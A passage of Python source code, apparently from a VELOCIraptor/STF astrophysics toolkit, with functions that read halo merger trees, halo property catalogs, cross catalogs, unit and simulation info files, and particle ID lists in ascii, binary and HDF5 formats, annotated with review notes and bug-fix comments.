    numhalos[index] = result[1]
def ReadPropertyFileMultiWrapperNamespace(index,basefilename,ns,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
    """
    Wrapper around ReadPropertyFile that stores the result on a manager
    namespace (ns.hdata / ns.ndata) at position *index*.
    """
    catalog, nhalos = ReadPropertyFile(basefilename, ibinary, iseparatesubfiles, iverbose, desiredfields)
    ns.hdata[index] = catalog
    ns.ndata[index] = nhalos
def ReadHaloMergerTree(treefilename,ibinary=0,iverbose=0,imerit=False,inpart=False):
    """
    Read a VELOCIraptor/STF (progenitor-based) merger tree.

    The ascii format contains
    a header with
        number_of_snapshots
        a description of how the tree was built
        total number of halos across all snapshots
    then followed by data
    for each snapshot
        snapshotvalue numhalos
        haloid_1 numprogen_1
        progenid_1
        progenid_2
        ...
        progenid_numprogen_1
        haloid_2 numprogen_2
        .
        .
        .
    one can also have an output format that has an additional field for each
    progenitor, the meritvalue.

    Args:
        treefilename: ascii tree file (ibinary=0) or a text file listing the
            per-snapshot HDF5 base names (ibinary=2).
        ibinary: 0 = ascii, 2 = HDF5 file list; anything else returns [].
        iverbose: 0 silent, 1 progress, 2 per-snapshot detail.
        imerit: also read per-progenitor merit values into tree[i]['Merit'].
        inpart: also read particle counts into 'Npart' / 'Npart_progen'.

    Returns:
        list of per-snapshot dicts with keys 'haloID', 'Num_progen',
        'Progen' (+ optional 'Merit', 'Npart', 'Npart_progen').
    """
    # NOTE(review): time.clock() was removed in Python 3.8.
    start = time.clock()
    tree=[]
    if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
    if (os.path.isfile(treefilename)==False):
        print("Error, file not found")
        return tree
    # first pass: only determine the number of snapshots so the output list
    # can be allocated before parsing
    #if ascii format
    if (ibinary==0):
        treefile = open(treefilename, 'r')
        numsnap=int(treefile.readline())
        treefile.close()
    elif(ibinary==2):
        # HDF input: the file is a list of snapshot tree file names
        snaptreelist=open(treefilename,'r')
        numsnap = sum(1 for line in snaptreelist)
        snaptreelist.close()
    else:
        print("Unknown format, returning null")
        numsnap=0
        return tree
    tree=[{"haloID": [], "Num_progen": [], "Progen": []} for i in range(numsnap)]
    if (imerit):
        for i in range(numsnap):
            tree[i]['Merit']=[]
    if (inpart):
        for i in range(numsnap):
            tree[i]['Npart']=[]
            tree[i]['Npart_progen']=[]
    #if ascii format
    if (ibinary==0):
        treefile = open(treefilename, 'r')
        numsnap=int(treefile.readline())
        descrip=treefile.readline().strip()
        tothalos=int(treefile.readline())
        offset=0
        totalnumprogen=0
        for i in range(numsnap):
            [snapval,numhalos]=treefile.readline().strip().split('\t')
            snapval=int(snapval);numhalos=int(numhalos)
            #if really verbose
            if (iverbose==2): print(snapval,numhalos)
            tree[i]["haloID"]=np.zeros(numhalos, dtype=np.int64)
            tree[i]["Num_progen"]=np.zeros(numhalos, dtype=np.uint32)
            tree[i]["Progen"]=[[] for j in range(numhalos)]
            if (imerit): tree[i]["Merit"]=[[] for j in range(numhalos)]
            if (inpart):
                tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
                tree[i]["Npart_progen"]=[[] for j in range(numhalos)]
            for j in range(numhalos):
                # halo line: "haloID \t numprogen [\t npart]"
                data=treefile.readline().strip().split('\t')
                hid=np.int64(data[0]);nprog=np.uint32(data[1])
                tree[i]["haloID"][j]=hid
                tree[i]["Num_progen"][j]=nprog
                if (inpart):tree[i]["Npart"][j]=np.uint32(data[2])
                totalnumprogen+=nprog
                if (nprog>0):
                    tree[i]["Progen"][j]=np.zeros(nprog,dtype=np.int64)
                    if (imerit): tree[i]["Merit"][j]=np.zeros(nprog,dtype=np.float32)
                    if (inpart): tree[i]["Npart_progen"][j]=np.zeros(nprog,dtype=np.uint32)
                    # one space-separated line per progenitor follows
                    for k in range(nprog):
                        data=treefile.readline().strip().split(' ')
                        tree[i]["Progen"][j][k]=np.int64(data[0])
                        if (imerit):tree[i]["Merit"][j][k]=np.float32(data[1])
                        if (inpart):tree[i]["Npart_progen"][j][k]=np.uint32(data[2])
    elif(ibinary==2):
        snaptreelist=open(treefilename,'r')
        #read the first file, get number of snaps from hdf file
        snaptreename = snaptreelist.readline().strip()+".tree"
        treedata=h5py.File(snaptreename,"r")
        numsnaps=treedata.attrs['Number_of_snapshots']
        treedata.close()
        snaptreelist.close()
        snaptreelist=open(treefilename,'r')
        for snap in range(numsnaps):
            snaptreename = snaptreelist.readline().strip()+".tree"
            if (iverbose): print("Reading",snaptreename)
            # NOTE(review): this handle is never closed inside the loop —
            # relies on h5py/gc to release it.
            treedata = h5py.File(snaptreename,"r")
            tree[snap]["haloID"] = np.asarray(treedata["ID"])
            tree[snap]["Num_progen"] = np.asarray(treedata["NumProgen"])
            if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
            #See if the dataset exits
            if("ProgenOffsets" in treedata.keys()):
                #Find the indices to split the array
                split = np.add(np.asarray(treedata["ProgenOffsets"]),tree[snap]["Num_progen"],dtype=np.uint64,casting="unsafe")
                #Read in the progenitors, splitting them as reading them in
                tree[snap]["Progen"] = np.split(treedata["Progenitors"][:],split[:-1])
                if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"],split[:-1])
                if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"],split[:-1])
        snaptreelist.close()
    if (iverbose): print("done reading tree file ",time.clock()-start)
    return tree
def ReadHaloMergerTreeDescendant(treefilename,ireverseorder=True,ibinary=0,iverbose=0,imerit=False,inpart=False):
    """
    Read a VELOCIraptor/STF descendant-based merger tree.

    The ascii format contains a header with
        number_of_snapshots
        a description of how the tree was built
        total number of halos across all snapshots
    then, for each snapshot, "snapshotvalue numhalos" followed by one
    "haloid ndescen [npart]" line per halo and one "descenid rank [merit]
    [npart]" line per descendant. One can also have an output format that has
    an additional field for each descendant, the meritvalue.

    Args:
        treefilename: ascii tree file (ibinary=0) or a text file listing the
            per-snapshot HDF5 base names (ibinary=2).
        ireverseorder: ascii only — store snapshot i at list slot
            numsnap-1-i (file written newest-first).
        ibinary: 0 = ascii, 2 = HDF5 file list; anything else returns [].
        iverbose: 0 silent, 1 progress, 2 per-snapshot detail.
        imerit: also read per-descendant merit values into 'Merit'.
        inpart: also read particle counts into 'Npart' / 'Npart_descen'.

    Returns:
        list of per-snapshot dicts with keys 'haloID', 'Num_descen',
        'Descen', 'Rank' (+ optional 'Merit', 'Npart', 'Npart_descen').
    """
    start = time.clock()
    tree=[]
    if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
    if (os.path.isfile(treefilename)==False):
        print("Error, file not found")
        return tree
    #find out how many snapshots there are
    #if ascii format
    if (ibinary==0):
        if (iverbose): print("Reading ascii input")
        treefile = open(treefilename, 'r')
        numsnap=int(treefile.readline())
        treefile.close()
    #hdf format, input file is a list of filenames
    elif(ibinary==2):
        if (iverbose): print("Reading HDF5 input")
        snaptreelist=open(treefilename,'r')
        numsnap = sum(1 for line in snaptreelist)
        snaptreelist.close()
    else:
        print("Unknown format, returning null")
        numsnap=0
        return tree
    tree=[{"haloID": [], "Num_descen": [], "Descen": [], "Rank": []} for i in range(numsnap)]
    if (imerit):
        for i in range(numsnap):
            tree[i]['Merit']=[]
    if (inpart):
        for i in range(numsnap):
            tree[i]['Npart']=[]
            tree[i]['Npart_descen']=[]
    if (ibinary==0):
        treefile = open(treefilename, 'r')
        numsnap=int(treefile.readline())
        descrip=treefile.readline().strip()
        tothalos=int(treefile.readline())
        offset=0
        totalnumdescen=0
        for i in range(numsnap):
            # ii is the output slot; reversed when the file is newest-first
            ii=i
            if (ireverseorder): ii=numsnap-1-i
            [snapval,numhalos]=treefile.readline().strip().split('\t')
            snapval=int(snapval);numhalos=int(numhalos)
            #if really verbose
            if (iverbose==2): print(snapval,numhalos)
            tree[ii]["haloID"]=np.zeros(numhalos, dtype=np.int64)
            tree[ii]["Num_descen"]=np.zeros(numhalos, dtype=np.uint32)
            tree[ii]["Descen"]=[[] for j in range(numhalos)]
            tree[ii]["Rank"]=[[] for j in range(numhalos)]
            if (imerit): tree[ii]["Merit"]=[[] for j in range(numhalos)]
            if (inpart):
                # BUG FIX: 'Npart' was allocated at tree[i] instead of
                # tree[ii], landing in the wrong snapshot slot whenever
                # ireverseorder was set
                tree[ii]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
                tree[ii]["Npart_descen"]=[[] for j in range(numhalos)]
            for j in range(numhalos):
                data=treefile.readline().strip().split('\t')
                hid=np.int64(data[0]);ndescen=np.uint32(data[1])
                tree[ii]["haloID"][j]=hid
                tree[ii]["Num_descen"][j]=ndescen
                if (inpart):tree[ii]["Npart"][j]=np.uint32(data[2])
                totalnumdescen+=ndescen
                if (ndescen>0):
                    tree[ii]["Descen"][j]=np.zeros(ndescen,dtype=np.int64)
                    tree[ii]["Rank"][j]=np.zeros(ndescen,dtype=np.uint32)
                    if (imerit): tree[ii]["Merit"][j]=np.zeros(ndescen,dtype=np.float32)
                    # BUG FIX: counts are uint32 values (see the fill below and
                    # the progenitor reader); was allocated as float32
                    if (inpart): tree[ii]["Npart_descen"][j]=np.zeros(ndescen,dtype=np.uint32)
                    for k in range(ndescen):
                        data=treefile.readline().strip().split(' ')
                        tree[ii]["Descen"][j][k]=np.int64(data[0])
                        tree[ii]["Rank"][j][k]=np.uint32(data[1])
                        if (imerit): tree[ii]["Merit"][j][k]=np.float32(data[2])
                        if (inpart): tree[ii]["Npart_descen"][j][k]=np.uint32(data[3])
    #hdf format
    elif(ibinary==2):
        snaptreelist=open(treefilename,'r')
        #read the first file, get number of snaps from hdf file
        snaptreename = snaptreelist.readline().strip()+".tree"
        treedata=h5py.File(snaptreename,"r")
        numsnaps=treedata.attrs['Number_of_snapshots']
        treedata.close()
        snaptreelist.close()
        snaptreelist=open(treefilename,'r')
        for snap in range(numsnap):
            snaptreename = snaptreelist.readline().strip()+".tree"
            if (iverbose): print("Reading",snaptreename)
            treedata = h5py.File(snaptreename,"r")
            tree[snap]["haloID"] = np.array(treedata["ID"])
            tree[snap]["Num_descen"] = np.array(treedata["NumDesc"])
            if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
            #See if the dataset exits
            if("DescOffsets" in treedata.keys()):
                #Find the indices to split the array
                split = np.add(np.array(treedata["DescOffsets"]), tree[snap]["Num_descen"],dtype=np.uint64,casting="unsafe")
                # Read in the data splitting it up as reading it in
                tree[snap]["Rank"] = np.split(treedata["Ranks"][:],split[:-1])
                tree[snap]["Descen"] = np.split(treedata["Descendants"][:],split[:-1])
                # BUG FIX: was stored under the key 'Npart_progen' although
                # this function initialises 'Npart_descen'. The on-disk
                # dataset name "ProgenNpart" is kept as-is — presumably the
                # tree builder writes it under that name; TODO confirm.
                if(inpart): tree[snap]["Npart_descen"] = np.split(treedata["ProgenNpart"][:],split[:-1])
                if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"][:],split[:-1])
        snaptreelist.close()
    if (iverbose): print("done reading tree file ",time.clock()-start)
    return tree
def ReadHaloPropertiesAcrossSnapshots(numsnaps,snaplistfname,inputtype,iseperatefiles,iverbose=0,desiredfields=[]):
    """
    Read halo data from the snapshots listed in the file snaplistfname.

    For many HDF5 snapshots (numsnaps>20 and inputtype==2) the catalogs are
    read in parallel with one process per snapshot chunk; otherwise they are
    read serially.

    Args:
        numsnaps: number of snapshot catalog names listed in snaplistfname.
        snaplistfname: text file, one catalog base name per line.
        inputtype: format flag forwarded to ReadPropertyFile (2 = HDF5).
        iseperatefiles: forwarded as iseparatesubfiles to ReadPropertyFile.
        iverbose: verbosity flag forwarded to ReadPropertyFile.
        desiredfields: optional field subset forwarded to ReadPropertyFile.

    Returns:
        (halodata, ngtot, atime): per-snapshot catalogs and halo counts.
        NOTE: atime entries are left at 0 — ReadPropertyFile does not return
        a scale factor, and the parallel wrapper never fills them either.
    """
    halodata=[dict() for j in range(numsnaps)]
    ngtot=[0 for j in range(numsnaps)]
    atime=[0 for j in range(numsnaps)]
    start=time.clock()
    print("reading data")
    #if there are a large number of snapshots to read, read in parallel
    #only read in parallel if worthwhile, specifically if large number of snapshots and snapshots are ascii
    iparallel=(numsnaps>20 and inputtype==2)
    if (iparallel):
        #determine maximum number of threads
        nthreads=min(mp.cpu_count(),numsnaps)
        nchunks=int(np.ceil(numsnaps/float(nthreads)))
        print("Using", nthreads,"threads to parse ",numsnaps," snapshots in ",nchunks,"chunks")
        #load file names
        snapnamelist=open(snaplistfname,'r')
        catfilename=["" for j in range(numsnaps)]
        for j in range(numsnaps):
            catfilename[j]=snapnamelist.readline().strip()
        #allocate a manager
        manager = mp.Manager()
        #use manager to specify the dictionary and list that can be accessed by threads
        hdata=manager.list([manager.dict() for j in range(numsnaps)])
        ndata=manager.list([0 for j in range(numsnaps)])
        adata=manager.list([0 for j in range(numsnaps)])
        #now for each chunk run a set of proceses
        for j in range(nchunks):
            offset=j*nthreads
            #if last chunk then must adjust nthreads
            if (j==nchunks-1):
                nthreads=numsnaps-offset
            #when calling a process pass manager based proxies, which then are used to copy data back
            processes=[mp.Process(target=ReadPropertyFileMultiWrapper,args=(catfilename[offset+k],k+offset,hdata,ndata,adata,inputtype,iseperatefiles,iverbose,desiredfields)) for k in range(nthreads)]
            #start each process
            #store the state of each thread, alive or not, and whether it has finished
            activethreads=[[True,False] for k in range(nthreads)]
            count=0
            for p in processes:
                print("reading", catfilename[offset+count])
                p.start()
                #space threads apart (join's time out is 0.25 seconds
                p.join(0.2)
                count+=1
            totactivethreads=nthreads
            while(totactivethreads>0):
                count=0
                for p in processes:
                    #join thread and see if still active
                    p.join(0.5)
                    if (p.is_alive()==False):
                        #if thread nolonger active check if its been processed
                        if (activethreads[count][1]==False):
                            #make deep copy of manager constructed objects that store data
                            #halodata[i][offset+count]=deepcopy(hdata[offset+count])
                            #try instead init a dictionary
                            halodata[offset+count]=dict(hdata[offset+count])
                            ngtot[offset+count]=ndata[offset+count]
                            atime[offset+count]=adata[offset+count]
                            #effectively free the data in manager dictionary
                            hdata[offset+count]=[]
                            activethreads[count][0]=False
                            activethreads[count][1]=True
                            totactivethreads-=1
                    count+=1
            #terminate threads
            for p in processes:
                p.terminate()
    else:
        snapnamelist=open(snaplistfname,'r')
        for j in range(0,numsnaps):
            catfilename=snapnamelist.readline().strip()
            print("reading ", catfilename)
            # BUG FIX: ReadPropertyFile returns (catalog, numtothalos) — the
            # old 3-value unpack here raised ValueError; atime[j] stays 0,
            # matching the parallel branch (adata is never written there).
            halodata[j],ngtot[j] = ReadPropertyFile(catfilename,inputtype,iseperatefiles,iverbose,desiredfields)
    print("data read in ",time.clock()-start)
    return halodata,ngtot,atime
def ReadCrossCatalogList(fname,meritlim=0.1,iverbose=0):
    """
    Read a cross catalog produced by halomergertree.

    Also allows trimming of the cross catalog by applying a merit threshold
    (meritlim) that may be stricter than the one used to produce the catalog.
    """
    begin = time.clock()
    if (iverbose): print("reading cross catalog")
    with open(fname, "r") as catfile:
        # skip the two header lines
        catfile.readline()
        catfile.readline()
        header = catfile.readline().strip().split('\t')
        nentries = np.int32(header[1])
        pdata = CrossCatalogList(nentries)
        for ientry in range(nentries):
            fields = catfile.readline().strip().split('\t')
            ncandidates = np.int32(fields[1])
            for _ in range(ncandidates):
                fields = catfile.readline().strip().split(' ')
                merit = np.float32(fields[1])
                nshared = np.float32(fields[2])
                # keep only matches above the (possibly stricter) merit limit
                if (merit > meritlim):
                    pdata.matches[ientry].append(np.int64(fields[0]))
                    pdata.matches[ientry].append(merit)
                    pdata.nsharedfrac[ientry].append(nshared)
                    pdata.nmatches[ientry] += 1
    if (iverbose): print("done reading cross catalog ",time.clock()-begin)
    return pdata
def ReadSimInfo(basefilename):
    """
    Read the information in the .siminfo file and return it as a dictionary.

    Each line has the form "key : value"; parsing stops at the first line
    with an empty key (including end-of-file).

    Args:
        basefilename: catalog name without the ".siminfo" suffix.

    Returns:
        dict mapping each key to float(value); [] if the file is missing
        (kept for backward compatibility with existing callers).
    """
    filename = basefilename + ".siminfo"
    if (os.path.isfile(filename)==False):
        print("file not found")
        return []
    cosmodata = {}
    # with-statement guarantees the file is closed even if a value fails to parse
    with open(filename, "r") as siminfofile:
        for line in siminfofile:
            fields = line.strip().split(" : ")
            if fields[0] == "":
                break
            cosmodata[fields[0]] = float(fields[1])
    return cosmodata
def ReadUnitInfo(basefilename):
    """
    Read the information in the .units file and return it as a dictionary.

    Each line has the form "key : value"; parsing stops at the first line
    with an empty key (including end-of-file).

    Args:
        basefilename: catalog name without the ".units" suffix.

    Returns:
        dict mapping each key to float(value); [] if the file is missing
        (kept for backward compatibility with existing callers).
    """
    filename = basefilename + ".units"
    if (os.path.isfile(filename)==False):
        print("file not found")
        return []
    unitdata = {}
    # with-statement guarantees the file is closed even if a value fails to parse
    with open(filename, "r") as unitsfile:
        for line in unitsfile:
            fields = line.strip().split(" : ")
            if fields[0] == "":
                break
            unitdata[fields[0]] = float(fields[1])
    return unitdata
def ReadParticleDataFile(basefilename,ibinary=0,iseparatesubfiles=0,iparttypes=0,iverbose=0, binarydtype=np.int64):
    """
    VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
    Note that a file will indicate how many files the total output has been split into

    Parameters
    ----------
    basefilename : str
        base name of the catalog files
    ibinary : int
        input format: 0 ascii, 1 binary, 2 hdf5
    iseparatesubfiles : int
        if 1, also read the associated ".sublevels" files
    iparttypes : int
        if 1, also read particle type information from catalog_parttypes
    iverbose : int
        if nonzero, print progress information
    binarydtype : numpy dtype
        integer type used for sizes/offsets/ids in binary files

    Returns
    -------
    dict
        'Npart' and 'Npart_unbound' (uint64 arrays over all groups) and
        'Particle_IDs' (per-group arrays, bound particles first then
        unbound); if iparttypes==1 also 'Particle_Types'.
        Returns [] if the groups file cannot be found.
    """
    inompi=True
    if (iverbose): print("reading particle data",basefilename)
    gfilename=basefilename+".catalog_groups"
    pfilename=basefilename+".catalog_particles"
    upfilename=pfilename+".unbound"
    tfilename=basefilename+".catalog_parttypes"
    utfilename=tfilename+".unbound"
    #check for file existence; if the plain name is missing assume an MPI
    #decomposed output split across ".0", ".1", ... files
    if (os.path.isfile(gfilename)==True):
        numfiles=0
    else:
        gfilename+=".0"
        pfilename+=".0"
        upfilename+=".0"
        tfilename+=".0"
        utfilename+=".0"
        inompi=False
        if (os.path.isfile(gfilename)==False):
            print("file not found")
            return []
    #load header information from file to get total number of groups
    #ascii
    if (ibinary==0):
        gfile = open(gfilename, 'r')
        [filenum,numfiles]=gfile.readline().split()
        filenum=int(filenum);numfiles=int(numfiles)
        [numhalos, numtothalos]= gfile.readline().split()
        numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
        #close the header file (previously leaked)
        gfile.close()
    #binary
    elif (ibinary==1):
        gfile = open(gfilename, 'rb')
        [filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
        [numhalos,numtothalos]=np.fromfile(gfile,dtype=np.uint64,count=2)
        #close the header file (previously leaked)
        gfile.close()
    #hdf
    elif (ibinary==2):
        gfile = h5py.File(gfilename, 'r')
        filenum=int(gfile["File_id"][0])
        numfiles=int(gfile["Num_of_files"][0])
        numhalos=np.uint64(gfile["Num_of_groups"][0])
        numtothalos=np.uint64(gfile["Total_num_of_groups"][0])
        gfile.close()
    particledata=dict()
    particledata['Npart']=np.zeros(numtothalos,dtype=np.uint64)
    particledata['Npart_unbound']=np.zeros(numtothalos,dtype=np.uint64)
    particledata['Particle_IDs']=[[] for i in range(numtothalos)]
    if (iparttypes==1):
        particledata['Particle_Types']=[[] for i in range(numtothalos)]
    #now for all files
    counter=np.uint64(0)
    subfilenames=[""]
    if (iseparatesubfiles==1): subfilenames=["",".sublevels"]
    for ifile in range(numfiles):
        for subname in subfilenames:
            bfname=basefilename+subname
            gfilename=bfname+".catalog_groups"
            pfilename=bfname+".catalog_particles"
            upfilename=pfilename+".unbound"
            tfilename=bfname+".catalog_parttypes"
            utfilename=tfilename+".unbound"
            if (inompi==False):
                gfilename+="."+str(ifile)
                pfilename+="."+str(ifile)
                upfilename+="."+str(ifile)
                tfilename+="."+str(ifile)
                utfilename+="."+str(ifile)
            if (iverbose) : print("reading",bfname,ifile)
            #ascii
            if (ibinary==0):
                gfile = open(gfilename, 'r')
                #read header information
                gfile.readline()
                [numhalos,foo]= gfile.readline().split()
                numhalos=np.uint64(numhalos)
                gfile.close()
                #load data
                gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
                numingroup=gdata[:numhalos]
                offset=gdata[int(numhalos):int(2*numhalos)]
                uoffset=gdata[int(2*numhalos):int(3*numhalos)]
                #particle id data
                pfile=open(pfilename, 'r')
                pfile.readline()
                [npart,foo]= pfile.readline().split()
                npart=np.uint64(npart)
                pfile.close()
                piddata=np.loadtxt(pfilename,skiprows=2,dtype=np.int64)
                upfile= open(upfilename, 'r')
                upfile.readline()
                [unpart,foo]= upfile.readline().split()
                unpart=np.uint64(unpart)
                upfile.close()
                upiddata=np.loadtxt(upfilename,skiprows=2,dtype=np.int64)
                if (iparttypes==1):
                    #particle type data
                    tfile= open(tfilename, 'r')
                    tfile.readline()
                    [npart,foo]= tfile.readline().split()
                    #fixed: convert counts (previously left as strings, which
                    #broke the unbound arithmetic below)
                    npart=np.uint64(npart)
                    tfile.close()
                    tdata=np.loadtxt(tfilename,skiprows=2,dtype=np.uint16)
                    utfile= open(utfilename, 'r')
                    utfile.readline()
                    [unpart,foo]= utfile.readline().split()
                    unpart=np.uint64(unpart)
                    utfile.close()
                    utdata=np.loadtxt(utfilename,skiprows=2,dtype=np.uint16)
            #binary
            elif (ibinary==1):
                gfile = open(gfilename, 'rb')
                np.fromfile(gfile,dtype=np.int32,count=2)
                [numhalos,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
                #need to generalise to
                numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numhalos)
                offset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
                uoffset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
                gfile.close()
                pfile = open(pfilename, 'rb')
                np.fromfile(pfile,dtype=np.int32,count=2)
                [npart,foo]=np.fromfile(pfile,dtype=np.uint64,count=2)
                piddata=np.fromfile(pfile,dtype=binarydtype ,count=npart)
                pfile.close()
                upfile = open(upfilename, 'rb')
                np.fromfile(upfile,dtype=np.int32,count=2)
                [unpart,foo]=np.fromfile(upfile,dtype=np.uint64,count=2)
                upiddata=np.fromfile(upfile,dtype=binarydtype ,count=unpart)
                upfile.close()
                if (iparttypes==1):
                    tfile = open(tfilename, 'rb')
                    np.fromfile(tfile,dtype=np.int32,count=2)
                    #NOTE(review): parttypes headers are read as uint16 while
                    #every other header uses uint64 -- confirm against the
                    #writer before relying on this branch
                    [npart,foo]=np.fromfile(tfile,dtype=np.uint16,count=2)
                    tdata=np.fromfile(tfile,dtype=binarydtype ,count=npart)
                    tfile.close()
                    utfile = open(utfilename, 'rb')
                    np.fromfile(utfile,dtype=np.int32,count=2)
                    [unpart,foo]=np.fromfile(utfile,dtype=np.uint16,count=2)
                    utdata=np.fromfile(utfile,dtype=binarydtype ,count=unpart)
                    utfile.close()
            #hdf
            elif (ibinary==2):
                gfile = h5py.File(gfilename, 'r')
                numhalos=np.uint64(gfile["Num_of_groups"][0])
                numingroup=np.uint64(gfile["Group_Size"])
                offset=np.uint64(gfile["Offset"])
                uoffset=np.uint64(gfile["Offset_unbound"])
                gfile.close()
                pfile = h5py.File(pfilename, 'r')
                upfile = h5py.File(upfilename, 'r')
                piddata=np.int64(pfile["Particle_IDs"])
                upiddata=np.int64(upfile["Particle_IDs"])
                npart=len(piddata)
                unpart=len(upiddata)
                pfile.close()
                upfile.close()
                if (iparttypes==1):
                    tfile = h5py.File(tfilename, 'r')
                    utfile = h5py.File(utfilename, 'r')
                    #fixed: types live in the parttypes files; previously these
                    #were read from the already closed particle-id files, which
                    #raises with h5py and targets the wrong datasets anyway
                    tdata=np.uint16(tfile["Particle_Types"])
                    utdata=np.uint16(utfile["Particle_Types"])
                    tfile.close()
                    utfile.close()
            #now with data loaded, process it to produce data structure
            #skip empty (sub)files: nothing to store, and the unbound
            #bookkeeping below cannot index empty arrays
            if (numhalos==0): continue
            particledata['Npart'][counter:counter+numhalos]=numingroup
            #derive the number of unbound particles per group from
            #consecutive unbound offsets (last group uses the total count)
            unumingroup=np.zeros(numhalos,dtype=np.uint64)
            for i in range(int(numhalos-1)):
                unumingroup[i]=(uoffset[i+1]-uoffset[i]);
            unumingroup[-1]=(unpart-uoffset[-1])
            particledata['Npart_unbound'][counter:counter+numhalos]=unumingroup
            for i in range(numhalos):
                #bound ids first, then unbound ids
                particledata['Particle_IDs'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
                particledata['Particle_IDs'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=piddata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
                particledata['Particle_IDs'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=upiddata[uoffset[i]:uoffset[i]+unumingroup[i]]
                if (iparttypes==1):
                    particledata['Particle_Types'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
                    particledata['Particle_Types'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=tdata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
                    particledata['Particle_Types'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=utdata[uoffset[i]:uoffset[i]+unumingroup[i]]
            counter+=numhalos
    return particledata
def ReadSOParticleDataFile(basefilename,ibinary=0,iverbose=0,binarydtype=np.int64):
    """
    VELOCIraptor/STF .catalog_SOlist reader: loads, for each spherical
    overdensity (SO) region, its size and the ids of its particles, in
    ascii (ibinary=0), binary (ibinary=1) or hdf5 (ibinary=2) format.
    Note that a file will indicate how many files the total output has been split into

    Returns
    -------
    dict
        'Npart' (uint64 array of SO region sizes) and 'Particle_IDs'
        (list of per-region id arrays); [] if the file is missing.
    """
    inompi=True
    if (iverbose): print("reading particle data",basefilename)
    filename=basefilename+".catalog_SOlist"
    #check for file existence; fall back to the ".0" MPI split file
    if (os.path.isfile(filename)==True):
        numfiles=0
    else:
        filename+=".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found",filename)
            return []
    #load header information from file to get total number of SO regions
    #ascii
    if (ibinary==0):
        gfile = open(filename, 'r')
        [filenum,numfiles]=gfile.readline().split()
        filenum=int(filenum);numfiles=int(numfiles)
        [numSO, numtotSO]= gfile.readline().split()
        [numparts, numtotparts]= gfile.readline().split()
        #fixed: the totals were previously never converted (numtotSO was
        #assigned to a stray numtothalos variable), so the allocation of
        #the output arrays below failed on string input
        numSO=np.uint64(numSO);numtotSO=np.uint64(numtotSO)
        numparts=np.uint64(numparts);numtotparts=np.uint64(numtotparts)
        gfile.close()
    #binary
    elif (ibinary==1):
        gfile = open(filename, 'rb')
        [filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
        [numSO,numtotSO]=np.fromfile(gfile,dtype=np.uint64,count=2)
        [numparts,numtotparts]=np.fromfile(gfile,dtype=np.uint64,count=2)
        gfile.close()
    #hdf
    elif (ibinary==2):
        gfile = h5py.File(filename, 'r')
        filenum=int(gfile["File_id"][0])
        numfiles=int(gfile["Num_of_files"][0])
        numSO=np.uint64(gfile["Num_of_SO_regions"][0])
        numtotSO=np.uint64(gfile["Total_num_of_SO_regions"][0])
        numparts=np.uint64(gfile["Num_of_particles_in_SO_regions"][0])
        numtotparts=np.uint64(gfile["Total_num_of_particles_in_SO_regions"][0])
        gfile.close()
    particledata=dict()
    particledata['Npart']=[]
    particledata['Particle_IDs']=[]
    if (iverbose):
        print("SO lists contains ",numtotSO," regions containing total of ",numtotparts," in ",numfiles," files")
    if (numtotSO==0):
        return particledata
    particledata['Npart']=np.zeros(numtotSO,dtype=np.uint64)
    particledata['Particle_IDs']=[[] for i in range(numtotSO)]
    #now for all files
    counter=np.uint64(0)
    for ifile in range(numfiles):
        filename=basefilename+".catalog_SOlist"
        if (inompi==False):
            filename+="."+str(ifile)
        #ascii
        if (ibinary==0):
            gfile = open(filename, 'r')
            #read header information (three lines: file ids, SO counts,
            #particle counts)
            gfile.readline()
            [numSO,foo]= gfile.readline().split()
            [numparts,foo]= gfile.readline().split()
            numSO=np.uint64(numSO)
            #fixed: previously converted numSO twice, leaving numparts wrong
            numparts=np.uint64(numparts)
            gfile.close()
            #load data; fixed: use filename (gfilename was undefined here)
            #and skip all three header rows, not two
            gdata=np.loadtxt(filename,skiprows=3,dtype=np.uint64)
            numingroup=gdata[:numSO]
            offset=gdata[np.int64(numSO):np.int64(2*numSO)]
            piddata=gdata[np.int64(2*numSO):np.int64(2*numSO+numparts)]
        #binary
        elif (ibinary==1):
            gfile = open(filename, 'rb')
            np.fromfile(gfile,dtype=np.int32,count=2)
            [numSO,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
            [numparts,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
            numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numSO)
            offset=np.fromfile(gfile,dtype=binarydtype,count=numSO)
            piddata=np.fromfile(gfile,dtype=binarydtype ,count=numparts)
            gfile.close()
        #hdf
        elif (ibinary==2):
            gfile = h5py.File(filename, 'r')
            numSO=np.uint64(gfile["Num_of_SO_regions"][0])
            numingroup=np.uint64(gfile["SO_size"])
            offset=np.uint64(gfile["Offset"])
            piddata=np.int64(gfile["Particle_IDs"])
            gfile.close()
        #now with data loaded, process it to produce data structure
        particledata['Npart'][counter:counter+numSO]=numingroup
        for i in range(numSO):
            particledata['Particle_IDs'][int(i+counter)]=np.array(piddata[offset[i]:offset[i]+numingroup[i]])
        counter+=numSO
    return particledata
"""
